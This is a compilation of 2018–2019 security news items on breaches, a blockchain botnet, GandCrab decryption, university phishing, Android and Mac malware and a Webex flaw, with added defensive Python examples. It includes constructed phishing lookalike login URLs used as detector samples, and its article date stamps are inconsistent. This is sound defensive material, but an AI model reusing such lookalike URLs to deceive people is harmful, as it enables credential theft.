It is, however, her next comment that should sound a warning to all companies of any size that process -- and allow the unlawful processing -- of EU users' data: "We considered these contraventions to be so serious we imposed the maximum penalty under the previous legislation. The fine would inevitably have been significantly higher under the GDPR. One of our main motivations for taking enforcement action is to drive meaningful change in how organizations handle people's personal data. Our work is continuing."

GDPR isn't merely designed to punish transgressors; it is designed to punish them so severely that they will actually change their business practices. Much larger fines under GDPR are inevitable.

BA Says 185,000 More Customers Affected in Cyber Attack
27.10.2019 securityweek
Attack  Incident

British Airways owner IAG on Thursday said that a further 185,000 customers may have had their personal details stolen in a cyber attack earlier this year.

This includes the holders of 77,000 payment cards whose name, billing address, email address and card payment information have potentially been compromised.

A further 108,000 people's personal details without card verification value have also been compromised, the airline said in a statement.

"While British Airways does not have conclusive evidence that the data was removed from its systems, it is taking a prudent approach in notifying potentially affected customers, advising them to contact their bank or card provider as a precaution," it said.

The company, which has promised to compensate any affected customers, said there had been no verified cases of fraud since its first announcement about the cyber attack in September.

BA at the time took out full-page adverts in the UK newspapers to apologise to customers and called the theft "a very sophisticated, malicious, criminal attack on our website".

The company could be expected to comment further on the attack when IAG publishes its third quarter results on Friday.

The attack came after previous IT woes, including a worldwide system outage last year that affected thousands of customers.

Experts presented BOTCHAIN, the first fully functional Botnet built upon the Bitcoin Protocol
26.10.2019 securityaffairs

Security experts Antonio Pirozzi and Pierluigi Paganini presented BOTCHAIN, the first fully functional Botnet built upon the Bitcoin Protocol.
Security expert Antonio Pirozzi, director of the ZLab malware lab at the firm Cybaze, presented at the EU Cyber Threat Conference in Dublin the research he conducted together with Pierluigi Paganini (aka @securityaffairs) on how crooks could abuse the blockchain for malicious purposes.

The presentation titled “BOTCHAIN aka The Dark side of Blockchain” includes details about the first fully functional Botnet built upon the Bitcoin Protocol named “BOTCHAIN”.

The blockchain is “read-only” by design: it is resilient to data modification and records transactions between two parties in a verifiable and reliable way without the need for a third party. These properties make blockchain a privileged technology for many applications (e.g. healthcare, supply chain tracking, smart contracts, identity management), but it can also be abused by cybercriminals to carry out malicious activities.

Pirozzi explains that cybercriminals have already exploited the blockchain in attacks in the wild, for example in the case of the popular carding store Joker’s Stash, which adopted a peer-to-peer DNS system based on blockchain.

The Automated Vending Cart (AVC) website was launched in 2017 using blockchain DNS alongside its Tor (.onion) domain to hide malicious activity and make the platform bulletproof. Blockchain-based TLDs like .bit, .bazar and .coin provide cybercriminals with a new level of covertness for their online marketplaces.

Pirozzi cited a recent study by researchers from RWTH Aachen University (Germany) demonstrating how the blockchain could be used as permanent storage for any kind of data, including illegal content such as child pornography and terrorist propaganda. The researchers analyzed Bitcoin transactions and found at least 274 links to child abuse content or to dark web services.

Pirozzi and Paganini demonstrated in practice how cybercriminals could abuse the blockchain for malicious purposes.

“Cybercriminals could abuse the ‘OP_RETURN’ field of a Bitcoin transaction to deliver a malware control mechanism, botnet commands, or a malware distribution mechanism, as also presented during the Black Hat ASIA 2016 conference by INTERPOL’s Christian Karam and Kaspersky’s Vitaly Kamluk,” said Pirozzi.

“Our research demonstrates that it is possible to abuse blockchain technology to set up a command and control mechanism for malware that leverages the blockchain. BOTCHAIN is the first fully functional botnet built upon the Bitcoin protocol,” added Paganini. “Many threat actors, including APT groups, already have the technical capabilities to develop such a botnet; for this reason, it is crucial to explore how attackers can abuse the blockchain.”

Pirozzi explained that in the past other research teams also investigated the possibility of using blockchain technology as botnet infrastructure; the most important works are ZombieCoin, Botract, and UnblockableChains, the former two of which are based on Ethereum.

“BOTCHAIN is the first fully functional botnet built upon the Bitcoin protocol. Unlike other similar botnets, BOTCHAIN has high-availability characteristics because zombies do not have any hardcoded C2 address: attackers could use any wallet as C2. Unlike ZombieCoin, it uses a hidden service for dynamic C2 discovery, like the SKYNET botnet of 2012,” explained Pirozzi.

“Over the years crooks have adopted different techniques to build more resilient and covert topologies for their botnets, from simple IRC or HTTP to UDP over TCP, P2P networks, DGAs or abusing cloud services. All these techniques are vulnerable to takedown by law enforcement and security firms once the network topology has been discovered. In this PoC, the discovery and analysis of one single bot won’t expose the entire botnet or a portion of it.”

“Of course, there is an economic aspect to consider when dealing with a Bitcoin blockchain-based botnet. We have analyzed it in our research and I can tell you that it is not a problem for persistent actors that want to use it in targeted attacks,” Paganini said.

Gavin Andresen, chief scientist at the Bitcoin Foundation, declared that using C&C on the blockchain would be “very expensive” due to the transaction fees hackers would have to pay. He also noted that botnet operators don’t want there to be any permanent record of their crimes.

Pirozzi also said:

“If you pay too low transaction fees, your transaction might never be confirmed and will become stuck. This is a limit for botnet operators, but there are specific moments in the Bitcoin market that are more convenient for making a transaction because transaction fees per byte become low. Crooks could exploit these specific moments to conduct a massive malicious campaign.”

It is a common opinion among security experts and law enforcement agencies that cybercriminals could start abusing the blockchain for malicious purposes.

The research includes some suggestions and open points for mitigating this kind of threat. The experts explained that one possible solution is a blacklist for miners, so that blocks containing malicious content are not validated; the open issue remains identifying those specific blocks, which could be very hard given the introduction of obfuscation mechanisms.
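
Identifying the transactions that carry out-of-band data is the first step of the mitigation discussed above. The following added Python example (not BOTCHAIN code, and not the authors') shows the detection side: it parses Bitcoin output scripts (scriptPubKey), recognises the OP_RETURN form mentioned by Pirozzi, and extracts the pushed payload so an analyst or monitoring job can review it. The output scripts in the sample are constructed for the example.

```python
"""Find OP_RETURN payloads in Bitcoin transaction outputs.

Added example for the detection side of the discussion above; it is not
BOTCHAIN code. An OP_RETURN output's scriptPubKey starts with opcode 0x6a
followed by data pushes, which is where out-of-band payloads would sit.
The sample output scripts are constructed for this example.
"""
from typing import Dict, List, Optional

OP_RETURN = 0x6A
OP_PUSHDATA1, OP_PUSHDATA2, OP_PUSHDATA4 = 0x4C, 0x4D, 0x4E


def _read_int(script: bytes, pos: int, width: int) -> int:
    """Little-endian length field; fail loudly if the script ends early."""
    if pos + width > len(script):
        raise ValueError("truncated length field")
    return int.from_bytes(script[pos:pos + width], "little")


def extract_op_return(script: bytes) -> Optional[bytes]:
    """Return the concatenated pushed bytes if `script` is an OP_RETURN output,
    None if it is some other script type. Raises ValueError if malformed."""
    if not script or script[0] != OP_RETURN:
        return None
    pos, payload = 1, bytearray()
    while pos < len(script):
        op = script[pos]
        pos += 1
        if 1 <= op <= 0x4B:                     # direct push of `op` bytes
            n = op
        elif op == OP_PUSHDATA1:
            n, pos = _read_int(script, pos, 1), pos + 1
        elif op == OP_PUSHDATA2:
            n, pos = _read_int(script, pos, 2), pos + 2
        elif op == OP_PUSHDATA4:
            n, pos = _read_int(script, pos, 4), pos + 4
        elif op == 0x00 or 0x51 <= op <= 0x60:  # OP_0, OP_1..OP_16: no data bytes
            continue
        else:
            raise ValueError(f"unexpected opcode 0x{op:02x} after OP_RETURN")
        if pos + n > len(script):
            raise ValueError("truncated push")
        payload += script[pos:pos + n]
        pos += n
    return bytes(payload)


def scan_outputs(scripts_hex: List[str]) -> List[Dict]:
    """Scan hex-encoded scriptPubKeys; one finding per OP_RETURN output.
    Printable payloads are decoded so an analyst can eyeball them; malformed
    scripts are reported rather than silently skipped."""
    findings = []
    for vout, hex_script in enumerate(scripts_hex):
        try:
            data = extract_op_return(bytes.fromhex(hex_script))
        except ValueError as exc:
            findings.append({"vout": vout, "error": str(exc)})
            continue
        if data is None:
            continue
        printable = all(0x20 <= b < 0x7F for b in data)
        findings.append({
            "vout": vout,
            "size": len(data),
            "text": data.decode("ascii") if printable else None,
        })
    return findings


# Constructed sample outputs of one transaction:
#   vout 0: ordinary P2PKH script (hash160 zeroed for the example)
#   vout 1: OP_RETURN pushing the 5 bytes "hello"
#   vout 2: OP_RETURN with an 80-byte PUSHDATA1 payload (80 x 'A')
#   vout 3: OP_RETURN claiming a 5-byte push but carrying only 1 byte
SAMPLE_OUTPUTS = [
    "76a914" + "00" * 20 + "88ac",
    "6a05" + "hello".encode().hex(),
    "6a4c50" + "41" * 80,
    "6a0568",
]

if __name__ == "__main__":
    for finding in scan_outputs(SAMPLE_OUTPUTS):
        print(finding)
```

The parser only looks at output scripts; feeding it the outputs of every transaction in a block gives a feed of OP_RETURN payloads whose size, frequency and source wallets can then be profiled. As the article notes, obfuscated payloads will not look like text, so the `text` field is a convenience for analysts, not a detection criterion.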

Many experts believe that quantum computers will allow modifying the data inside each transaction, but this is not possible now, and the introduction of quantum cryptography will probably prevent it.

At present it is impossible to take down the communication between bot and C2 even if we are able to identify the transactions involved; this aspect must be carefully analyzed.

UK ICO fines Facebook with maximum for Cambridge Analytica scandal
26.10.2019 securityaffairs

Facebook has been fined £500,000 by the UK’s Information Commissioner’s Office (ICO) for the Cambridge Analytica privacy scandal that exposed data of 87 million users.
The announcement was made by the UK’s data protection regulator, Information Commissioner Elizabeth Denham.

“The ICO’s investigation found that between 2007 and 2014, Facebook processed the personal information of users unfairly by allowing application developers access to their information without sufficiently clear and informed consent, and allowing access even if users had not downloaded the app, but were simply ‘friends’ with people who had.” she said.

This is the first financial penalty Facebook has faced for the Cambridge Analytica scandal.

According to the ICO, data from at least 1 million British citizens was “unfairly processed”; the organization blames Facebook because it “failed to take appropriate technical and organisational measures” to prevent the abuse of users’ data.

The ICO also accused Facebook of having “failed to make suitable checks on apps and developers using its platform.”

“Even after the misuse of the data was discovered in December 2015,” continues the ICO, “Facebook did not do enough to ensure those who continued to hold it had taken adequate and timely remedial action, including deletion. In the case of SCL Group, Facebook did not suspend the company from its platform until 2018.”

Facebook Data Breach

The social network giant announced that it is reviewing the ICO’s penalty and is asking for access to Cambridge Analytica’s servers to analyze the data they collected.

“We are grateful that the ICO has acknowledged our full co-operation throughout their investigation and have also confirmed they have found no evidence to suggest UK Facebook users’ data was in fact shared with Cambridge Analytica,” a Facebook spokesperson said.

“Now that their investigation is complete, we are hopeful that the ICO will now let us have access to CA servers so that we are able to audit the data they received.”

I personally believe that this fine is just symbolic if we compare it with potential penalties faced by the social network giant under EU’s General Data Protection Regulation (GDPR). GDPR establishes a maximum fine of 20 million euros or 4% of company annual global revenue (roughly £1.26 billion).

Experts released a free Decryption Tool for GandCrab ransomware
26.10.2019 securityaffairs

Good news for the victims of the infamous GandCrab ransomware: security experts have created a decryption tool that allows them to decrypt files without paying the ransom.
Security firm Bitdefender, along with Europol, the FBI, the Romanian Police and other law enforcement agencies, has developed a free ransomware decryption tool.

“The good news is that now you can have your data back without paying a cent to the cyber-criminals, as Bitdefender has released a free utility that automates the data decryption process.” reads the blog post published by Bitdefender.

“This tool recovers files encrypted by GandCrab ransomware versions 1, 4 and 5.”

Victims can determine the ransomware version by looking at the extension appended to the encrypted files and/or the ransom note. The following table lists this information for the various versions of the ransomware.

Version 1: extension .GDCB; ransom note starts with —= GANDCRAB =—
Version 2: extension .GDCB; ransom note starts with —= GANDCRAB =—
Version 3: extension .CRAB; ransom note starts with —= GANDCRAB V3 =—
Version 4: extension .KRAB; ransom note starts with —= GANDCRAB V4 =—
Version 5: extension .([A-Z]+) (random uppercase letters, e.g. .UKCZA); ransom note starts with —= GANDCRAB V5.0 =—
Version 5.0.1: extension .([A-Z]+) (e.g. .YIAQDG); ransom note starts with —= GANDCRAB V5.0.2 =—
Version 5.0.2: extension .([A-Z]+) (e.g. .CQXGPMKNR); ransom note starts with —= GANDCRAB V5.0.2 =—
Version 5.0.3: extension .([A-Z]+) (e.g. .HHFEHIOL); ransom note starts with —= GANDCRAB V5.0.2 =—

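
The version table above is easy to misread by hand, so here is an added Python example (not Bitdefender's decryptor) that encodes it as printed and answers the two questions a responder has: which GandCrab version produced a given file, and whether the free tool (versions 1, 4 and 5, per the article) covers it. It handles the two ambiguities the table itself contains: versions 1 and 2 share extension and header, and the 5.0.x sub-versions share a random uppercase extension and the same listed header. File names and ransom-note text in the sample are constructed.

```python
"""Identify a GandCrab version from the encrypted-file extension and the
ransom-note header, following the version table above.

Added example, not Bitdefender's decryptor. It encodes the table exactly as
printed on the page; the sample file names and ransom-note text are constructed.
"""
import re
from typing import List

# (candidate versions, extension pattern, ransom-note header) per the table.
# Versions 1 and 2 share the .GDCB extension and the same header, so they
# cannot be told apart; the 5.0.x sub-versions share a random uppercase
# extension and, as listed, the same V5.0.2 header.
VERSION_TABLE = [
    (["1", "2"], r"\.GDCB$", "—= GANDCRAB =—"),
    (["3"], r"\.CRAB$", "—= GANDCRAB V3 =—"),
    (["4"], r"\.KRAB$", "—= GANDCRAB V4 =—"),
    (["5"], r"\.[A-Z]+$", "—= GANDCRAB V5.0 =—"),
    (["5.0.1", "5.0.2", "5.0.3"], r"\.[A-Z]+$", "—= GANDCRAB V5.0.2 =—"),
]

# Major versions the free tool handles, as stated in the article: 1, 4 and 5.
DECRYPTABLE_MAJORS = {"1", "4", "5"}


def note_header(note_text: str) -> str:
    """First non-empty line of the ransom note, whitespace trimmed."""
    for line in note_text.splitlines():
        if line.strip():
            return line.strip()
    return ""


def identify_version(filename: str, note_text: str) -> List[str]:
    """Candidate GandCrab versions matching both the file extension and the
    ransom-note header; an empty list means no row of the table matched."""
    header = note_header(note_text)
    candidates: List[str] = []
    for versions, ext_pattern, expected_header in VERSION_TABLE:
        if re.search(ext_pattern, filename) and header.startswith(expected_header):
            candidates.extend(versions)
    return candidates


def decryptor_status(versions: List[str]) -> str:
    """Whether the free decryptor covers every candidate version."""
    majors = {v.split(".")[0] for v in versions}
    if not majors:
        return "unknown"
    if majors <= DECRYPTABLE_MAJORS:
        return "supported"
    if majors & DECRYPTABLE_MAJORS:
        return "possibly"
    return "unsupported"


# Constructed samples: (encrypted file name, first lines of the ransom note).
SAMPLES = [
    ("report.docx.KRAB", "—= GANDCRAB V4 =—\n\n(constructed note body)"),
    ("photo.jpg.UKCZA", "—= GANDCRAB V5.0 =—\n\n(constructed note body)"),
    ("budget.xlsx.HHFEHIOL", "—= GANDCRAB V5.0.2 =—\n\n(constructed note body)"),
    ("notes.txt.GDCB", "—= GANDCRAB =—\n\n(constructed note body)"),
    ("scan.pdf.CRAB", "—= GANDCRAB V3 =—\n\n(constructed note body)"),
]

if __name__ == "__main__":
    for name, note in SAMPLES:
        versions = identify_version(name, note)
        print(f"{name}: versions {versions or '?'} -> {decryptor_status(versions)}")
```

Because the version 5 extension pattern matches any uppercase extension, the ransom-note header is what actually decides the row; a .KRAB file whose note reads V5.0 is classified as version 5, which is what the table says.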
“Developed in close partnership with Europol and the Romanian Police, and with support from the FBI and other law enforcement agencies, the tool lets victims around the world retrieve their encrypted information without paying tens of millions of dollars in ransom to hackers.” reads the statement published by Bitdefender.

“The new tool can now decrypt data ransomed by versions 1, 4 and 5 of the GandCrab malware, as well as all versions of the ransomware for a limited set of victims in Syria.”

GandCrab was first spotted earlier this year by cyber security firm LMNTRIX, which discovered an advertisement in a Russian hacking community on the dark web.

Anti-Ransom Remote Tool GandCrabDecryptor.

GandCrab is offered as a ransomware-as-a-service, where crooks offer the malware to criminals for a share of the ultimate profits.

This ransomware spreads via multiple attack vectors, including spam email, exploit kits and malware campaigns.

Phishing for knowledge
26.10.2019 Kaspersky

When we talk about phishing, top of mind are fake banking sites, payment systems, as well as mail and other globally popular services. However, cybercriminals have their fingers in far more pies than that. Less obviously, perhaps, students and university faculties are also in the line of fire. The reason is the research they carry out and the potentially valuable results.

Examples of phishing pages mimicking the login pages of the University of Washington, Harvard Business School, and Stanford University websites

Over the past year, we’ve registered phishing attacks against 131 universities in 16 countries. More than half (83 universities) are located in the US, followed by Britain (21), and Australia and Canada (7 each). Several well-known universities in Finland, Colombia, Hong Kong, India, Israel, the Netherlands, New Zealand, Poland, South Africa, Sweden, Switzerland, and the UAE have also experienced at least one phishing attack in the past year. The most popular universities for fraudsters so far this year are: University of Washington (11.6% of attacks), Cornell University (6.8%), University of Iowa (5.1%).

Although universities are aware of the need to protect their resources, fraudsters exploit the traditional weakest link: user inattentiveness. Depending on the level of access (lecturer, student, research associate), personal accounts on the university site can provide access to both general information as well as paid services and research results. Moreover, a lecturer’s account, for example, can provide attackers with information about salary, schedule, etc. All this can be used for identity theft or a targeted attack.

Cornell NetID is a unique electronic identifier used in combination with a password to provide access to non-public resources and university information

Phishing pages typically differ from the original only by the web address. However, despite the browser warning and, as in the case of the Cornell University fake page, the prompt to check the address bar (copied by the attackers from the original site), users often fail to spot the difference.

Besides login credentials, phishing pages can collect other information for bypassing anti-fraud systems

While analyzing the scripts of one of the phishing pages, we noticed that alongside user names and passwords, fraudsters collect information about IP addresses and the victim’s location. Cybercriminals can use this data to circumvent anti-fraud systems by masquerading as account holders.

How to stay protected
An old, but still important tip is to check the address bar of the site on which confidential data is about to be entered. But since this method relies solely on the human factor, the main recommendation for educational institutions is to use two-factor authentication, and for users — a software solution with anti-phishing capability.
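
The "check the address bar" advice fails in practice because the fakes are built to pass a glance, so here is an added Python example (not Kaspersky code) of what a correct host check looks like, the kind a mail gateway, proxy or browser extension would run. It distinguishes a genuine subdomain of the institution from the usual tricks: the expected domain as a prefix of a foreign host, the expected domain hidden in the userinfo part of the URL, punycode labels, and a correct host served without HTTPS. The expected domain is Cornell's real cornell.edu; every sample URL is constructed, and the lookalike hosts use the reserved .example TLD.

```python
"""Check that a login URL really belongs to the institution it imitates.

Added example illustrating the address-bar advice above; it is not Kaspersky
code. All sample URLs are constructed for the example (the lookalike hosts use
the reserved .example TLD); cornell.edu is used only as the expected domain.
"""
from urllib.parse import urlsplit


def hostname_of(url: str) -> str:
    """The host the browser will actually connect to: userinfo such as
    'cornell.edu@' and any port are discarded, case and a trailing dot ignored."""
    host = urlsplit(url).hostname or ""
    return host.rstrip(".").lower()


def host_matches(host: str, expected_domain: str) -> bool:
    """True only for the expected domain itself or one of its subdomains.
    A substring test is the classic mistake: 'cornell.edu.login-verify.example'
    contains 'cornell.edu' yet is controlled by whoever owns login-verify.example."""
    expected = expected_domain.rstrip(".").lower()
    return host == expected or host.endswith("." + expected)


def classify(url: str, expected_domain: str) -> str:
    """Verdict a user or a mail/proxy filter could act on."""
    host = hostname_of(url)
    if not host_matches(host, expected_domain):
        if any(label.startswith("xn--") for label in host.split(".")):
            return "suspicious: internationalized hostname"
        squashed = host.replace(".", "").replace("-", "")
        if expected_domain.replace(".", "") in squashed:
            return "suspicious: lookalike of " + expected_domain
        return "unexpected host: " + host
    if urlsplit(url).scheme != "https":
        return "legitimate host but not HTTPS"
    return "ok"


# Constructed sample URLs checked against the expected domain cornell.edu.
SAMPLE_URLS = [
    "https://login.cornell.edu/",                       # genuine subdomain
    "http://login.cornell.edu/",                        # right host, no TLS
    "https://cornell.edu.login-verify.example/netid",   # expected domain as a prefix
    "https://cornell.edu@evil.example/netid",           # expected domain as userinfo
    "https://xn--crnell-example.example/",              # punycode label (constructed)
]

if __name__ == "__main__":
    for url in SAMPLE_URLS:
        print(f"{url} -> {classify(url, 'cornell.edu')}")
```

The lookalike heuristic is deliberately simple (it only catches the expected name embedded in a foreign host) and is a warning, not a verdict; the one hard rule is `host_matches`, which is the check that the article's fake pages are designed to make users skip.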

Banking Trojans in Google Play Pose as Utility Apps
26.10.2018 securityweek
Android  Virus

Google recently removed 29 applications from Google Play after learning that they actually contained code to steal users’ banking information.

The applications, found in the official app store from August until early October 2018, were masquerading as utility programs, including device boosters, cleaners and battery managers, as well as horoscope-themed apps.

These programs, ESET security researchers reveal, were sophisticated mobile banking Trojans packing complex functionality and highly focused on staying hidden. This sets them apart from the malicious apps that impersonate legitimate financial institutions and display bogus login screens.

The Trojans could dynamically target any app on the victim’s device, courtesy of tailored phishing forms. The malware operators could control them remotely to intercept and redirect text messages to bypass SMS-based two-factor authentication, intercept call logs, and download and install other apps.

Although uploaded to Google Play under different developer names, these apps presented code similarities and shared the command and control (C&C) server, which led the researchers to the conclusion they were the work of a single attacker or group.

Once installed and launched, the apps would usually display an error message, claiming incompatibility with the victim’s device and informing the user they were removed. Instead, they would only hide from the user and covertly engage in nefarious operations. Some of the apps, however, did offer the promised functionality — such as displaying horoscopes.

The malicious payload carried by the programs was encrypted and hidden in each app’s assets. When executed, the payload launches a dropper that checks for the presence of an emulator or a sandbox and only then proceeds to decrypt and drop a loader and the actual banking malware.

The final payload was designed to impersonate banking apps installed on the victim’s device, intercept and send SMS messages, and download and install additional applications, based on the operator’s instructions.

The threat can “dynamically impersonate any app installed on a compromised device,” ESET reveals. For that, the malware obtains the HTML code of the installed apps and leverages that code to overlay bogus forms when legitimate apps are launched.

ESET says they discovered 29 such malicious apps, all of which have been removed from the official Android store. However, these programs did gather around 30,000 downloads before being removed.

“Fortunately, these particular banking Trojans do not employ advanced tricks to ensure their persistence on affected devices. Therefore, if you suspect you have installed any of these apps, you can simply uninstall them under Settings > (General) > Application manager/Apps,” ESET says.

Mac Malware Injects Ads Into Encrypted Traffic
26.10.2018 securityweek

A newly discovered piece of malware targeting macOS devices is capable of injecting ads into encrypted web traffic, Malwarebytes security researchers warn.

Detected as OSX.SearchAwesome, the malware is delivered through a malicious installer that arrives as a cracked app downloaded via a torrent file. The threat’s installer is a disk image file that lacks the usual decorations used to make it look legitimate.

When launched, the image file installs the components invisibly and then requests the user to authorize changes to Certificate Trust Settings and to allow a component called spi to modify the network configuration.

Similar to other adware programs out there, the spinstall app installs an application and launch agents, one of which is designed to execute the spi application. However, it doesn’t keep the app running constantly, meaning that the user can force it to quit, although the app opens again on the next login.

Another agent is designed to monitor spi.app for removal, and also to remove the other component of the malware if that happens.

SearchAwesome also installs the open-source program mitmproxy, which was designed to intercept, inspect, modify, and replay web traffic. It abuses the application to target both unencrypted and encrypted traffic in a man-in-the-middle (MitM) attack.

Armed with the ability to modify Certificate Trust Settings and using the mitmproxy certificate that is now trusted by the system, the malware gains access to HTTPS traffic, which is normally encrypted between the browser and the website, thus protected from prying eyes.

The threat injects JavaScript into every web page the victim visits. The script is loaded from a malicious website.

If spi.app is deleted, the uninstall agent runs a script to disable a proxy the adware set up initially, fetches information from the program’s preferences and sends it to a web server, and removes the preferences and the launch agents.

The script also causes an authentication request to appear four times, Malwarebytes reveals. Furthermore, the uninstaller leaves behind the mitmproxy software, and the certificate the app uses to access encrypted web traffic.

The adware seems innocuous at the moment, as it only injects a script to display ads but, given that the script is actually being loaded from an external server, the content could change at any time and phishing pages or malware could be served instead.

“The injected script could be used to do anything, from mining cryptocurrency to capturing browsing data to keylogging and more. Worse, the malware itself could invisibly capture data through the MitM attack, without relying on JavaScript or modifying the web page content,” Malwarebytes points out.

Even if the malware uninstalls itself, the potential for damage is not over, given that it leaves behind the tools it uses to execute the MitM attack. This means that another piece of malware could leverage those tools for its own nefarious purposes.
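
The leftovers described above (launch agents, a system proxy and a trusted mitmproxy certificate) are the artefacts a responder would check for on an affected Mac. The script below is an added example, not Malwarebytes' tooling and not the adware's own code. Its SAMPLE_* inputs are constructed to mirror the article; it assumes the removal watchdog is implemented with launchd's WatchPaths key, that the proxy sits on mitmproxy's default port 8080, and that `networksetup` and `security` print the formats shown. The parsers run anywhere; only main() touches a live system, and only on macOS.

```python
"""Triage the macOS leftovers described above: adware launch agents, a web
proxy pointing at mitmproxy, and a trusted mitmproxy certificate.

Added example. SAMPLE_* inputs are constructed, not captured from a real
infection; the WatchPaths watchdog, port 8080 and tool output formats are
assumptions.
"""
import plistlib
import re
import subprocess
import sys
from pathlib import Path

USER_WRITABLE = ("/Users/", "/Library/Application Support/", "/private/tmp/", "/tmp/")


def triage_launch_agent(plist_bytes: bytes) -> dict:
    """Explain why a LaunchAgent plist looks like the persistence described."""
    p = plistlib.loads(plist_bytes)
    args = list(p.get("ProgramArguments") or ([p["Program"]] if "Program" in p else []))
    watched = list(p.get("WatchPaths") or [])
    reasons = []
    if p.get("RunAtLoad"):
        reasons.append("starts at login (RunAtLoad)")
    if p.get("KeepAlive"):
        reasons.append("relaunched whenever it exits (KeepAlive)")
    if any(a.startswith(USER_WRITABLE) for a in args):
        reasons.append("program sits in a user-writable path")
    if any("spi.app" in a for a in args):
        reasons.append("launches spi.app")
    if any("spi.app" in w for w in watched):
        reasons.append("fires when spi.app changes or disappears (WatchPaths)")
    return {"label": p.get("Label"), "args": args, "reasons": reasons}


def proxy_points_at_localhost(networksetup_output: str, ports=(8080,)) -> bool:
    """True if `networksetup -getwebproxy <service>` shows an enabled proxy on a local port."""
    fields = {}
    for line in networksetup_output.splitlines():
        key, sep, value = line.partition(":")
        if sep:
            fields[key.strip()] = value.strip()
    try:
        port = int(fields.get("Port", "0"))
    except ValueError:
        port = 0
    return (fields.get("Enabled") == "Yes"
            and fields.get("Server") in ("127.0.0.1", "localhost")
            and port in ports)


def certificate_labels(security_output: str) -> list:
    """Labels of certificates listed by `security find-certificate -a -c <name> <keychain>`."""
    return re.findall(r'"labl"<blob>="([^"]*)"', security_output)


# Constructed inputs mirroring the article (not captured from a real infection).
SAMPLE_LAUNCHER = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
<key>Label</key><string>com.example.spi.launcher</string>
<key>ProgramArguments</key><array><string>/Users/victim/Library/Application Support/spi.app/Contents/MacOS/spi</string></array>
<key>RunAtLoad</key><true/>
</dict></plist>"""
SAMPLE_WATCHDOG = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
<key>Label</key><string>com.example.spi.watchdog</string>
<key>ProgramArguments</key><array><string>/bin/sh</string><string>/Users/victim/Library/Application Support/spi_uninstall.sh</string></array>
<key>WatchPaths</key><array><string>/Users/victim/Library/Application Support/spi.app</string></array>
</dict></plist>"""
SAMPLE_PROXY = "Enabled: Yes\nServer: 127.0.0.1\nPort: 8080\nAuthenticated Proxy Enabled: 0\n"
SAMPLE_SECURITY = ('keychain: "/Library/Keychains/System.keychain"\nattributes:\n'
                   '    "alis"<blob>="mitmproxy"\n    "labl"<blob>="mitmproxy"\n')


def main() -> int:
    if sys.platform != "darwin":
        print("live checks need macOS; the parsers can be run on the SAMPLE_* inputs")
        return 0

    def run(*cmd):
        return subprocess.run(cmd, capture_output=True, text=True).stdout

    for service in ("Wi-Fi", "Ethernet"):
        if proxy_points_at_localhost(run("networksetup", "-getwebproxy", service)):
            print(f"[!] {service}: web proxy still points at a local port")
    keychain = "/Library/Keychains/System.keychain"
    for label in certificate_labels(run("security", "find-certificate", "-a", "-c", "mitmproxy", keychain)):
        print(f"[!] {keychain} still holds a certificate labelled {label!r}")
    for plist in (Path.home() / "Library" / "LaunchAgents").glob("*.plist"):
        try:
            finding = triage_launch_agent(plist.read_bytes())
        except Exception as exc:  # malformed plist: report it and move on
            print(f"[?] {plist.name}: {exc}")
            continue
        if finding["reasons"]:
            print(f"[!] {plist.name}: " + "; ".join(finding["reasons"]))
    return 0


if __name__ == "__main__":
    sys.exit(main())
```

The launcher sample deliberately sets RunAtLoad without KeepAlive, which is the behaviour the article describes: the user can force spi to quit, but it comes back at the next login. Deleting a certificate found this way should be done from Keychain Access or `security delete-certificate`, after confirming it is not one the user installed for legitimate interception work.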

Google requires 2 years of Android security updates for popular devices
26.10.2018 securityaffairs
Android  Vulnerability

The media outlet The Verge obtained a copy of a contract between Google and OEMs that obliges them to two years of security updates for popular phones.
Google continues the battle for securing devices of its users, this time making mandatory for device makers two years of Android security updates.

One of the main problems with patch management is related to the distribution of security patches issued by Google for Android OS.

Device manufacturers often delay the installation of these security patches, exposing device owners to cyber attacks. Google is committed to solving this issue: during the Google I/O developer conference in May 2018 it announced its plan to update its OEM agreements to require Android device manufacturers to roll out security updates regularly.

A Google spokesperson declared that the 90-day requirement is “a minimum security hygiene requirement” and that “the majority of the deployed devices for over 200 different Android models from over 30 Android device manufacturers are running a security update from the last 90 days.”

The media outlet The Verge obtained a copy of the agreement between the tech giant and OEMs. The contract obliges Android device makers to regularly install updates for any popular phone or tablet for at least two years: they must roll out at least four security updates within one year of the phone's launch, and in the second year they have to continue to provide security updates, although the contract does not specify a minimum number. OEMs that violate the contract risk losing Google certification for upcoming Android devices.

“A contract obtained by The Verge requires Android device makers to regularly install updates for any popular phone or tablet for at least two years. Google’s contract with Android partners stipulates that they must provide “at least four security updates” within one year of the phone’s launch.” states The Verge.

“Security updates are mandated within the second year as well, though without a specified minimum number of releases.”

Android OEMs will be obliged to regularly provide security updates for popular devices that have been launched after January 31st, 2018 and that have more than 100,000 active users.

Besides this, the contract also stipulates that the manufacturers must not delay patch updates for security vulnerabilities for more than 90 days.

In other words, the minimum requirement of the contract is a security patch update every quarter.

The contract obtained by The Verge could have a massive impact on both OEMs and end users: the overall level of security of Android devices should increase significantly.

“But because manufacturers rely on Google for its suite of apps, the company can also make outright demands for updates in its contract. This contractual commitment to patching devices goes much further and guarantees in many cases that devices will remain up to date.” concludes The Verge.

“As Android splits following the EU ruling, the contract also raises questions about how non-Google phones will receive security updates without the same contractual pressures.”

Experts discovered a severe command injection flaw in Cisco Webex Meetings Desktop
26.10.2018 securityaffairs

Researchers discovered a “high” severity command injection vulnerability, tracked as CVE-2018-15442, in Cisco Webex Meetings Desktop.
It is time to patch the Cisco Webex video conferencing software in your organization again, to avoid ugly surprises.

Researchers Ron Bowes and Jeff McJunkin of Counter Hack discovered a “high” severity command injection vulnerability, tracked as CVE-2018-15442, in Cisco Webex Meetings Desktop.

The vulnerability could be exploited by an authenticated, local attacker to execute arbitrary commands as a privileged user.

“The vulnerability is due to insufficient validation of user-supplied parameters. An attacker could exploit this vulnerability by invoking the update service command with a crafted argument. An exploit could allow the attacker to run arbitrary commands with SYSTEM user privileges.” states the advisory published by Cisco.

“While the CVSS Attack Vector metric denotes the requirement for an attacker to have local access, administrators should be aware that in Active Directory deployments, the vulnerability could be exploited remotely by leveraging the operating system remote management tools.”

In other words, although the CVSS attack vector is local, in Active Directory deployments the flaw can be reached remotely through the operating system's remote management tools.

Malware or a malicious logged-in user could exploit the vulnerability to obtain SYSTEM privileges and carry out further malicious activity.

